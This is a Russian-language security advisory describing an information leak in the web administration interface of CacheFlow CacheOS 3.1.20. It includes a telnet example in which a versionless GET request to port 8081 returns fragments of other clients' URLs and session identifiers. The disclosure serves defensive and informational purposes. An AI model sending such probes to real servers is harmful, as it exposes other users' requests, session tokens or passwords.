Утечка кода страницы в интерфейсе Web администрирования в CacheOS

Дата публикации:
12.01.2002
Дата изменения:
16.10.2006
Всего просмотров:
610
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: CacheOS - программное обеспечение, поставляемое с системами Web кэширования CacheFlow.

Когда пользователь соединяется с системой через интерфейс Web администрирования на 8081 порту, и издает стандартный HTTP запрос к системе, система предотвратит пользователя от доступа к любой информации, управляемой кэш-сервером. Однако, пользователь, соединяющийся с системой и делая запрос без типа версии HTTP (т. е. HTTP/1.0 или HTTP/1.1) несколько раз, может получать доступ к чувствительной информации. Кэш-сервер пропустит информацию типа частей URL, к которым обращается клиент. Эта проблема позволяет пользователю собирать информацию, потенциально получать доступ к паролям, или другой чувствительной информации.

Уязвимость найдена в CacheFlow CacheOS 3.1.20 AVE

Пример:

localhost:~# telnet cacheflow 8081 
Trying xxx.xxx.xxx.xxx... 
Connected to cacheflow. 
Escape character is '^]'. 
GET /Secure/Local/console/cmhome.htm 

HTTP/1.0 404-Not Found 

404 Not Found

404 Not Found

The request ed URL "/Secure/Local/console/cmhome.htm Easp&o=0&sv=za5cb0d78&qid=E2BCA8F417ECE94DBDD27B75F951FFDA&uid=2c234acbec234 acbe &sid=3c234acbec234acbe&ord=1" was not found on this server.

Connection closed by foreign host



Ссылки: Источник
http://download.cacheflow.com/
или введите имя

CAPTCHA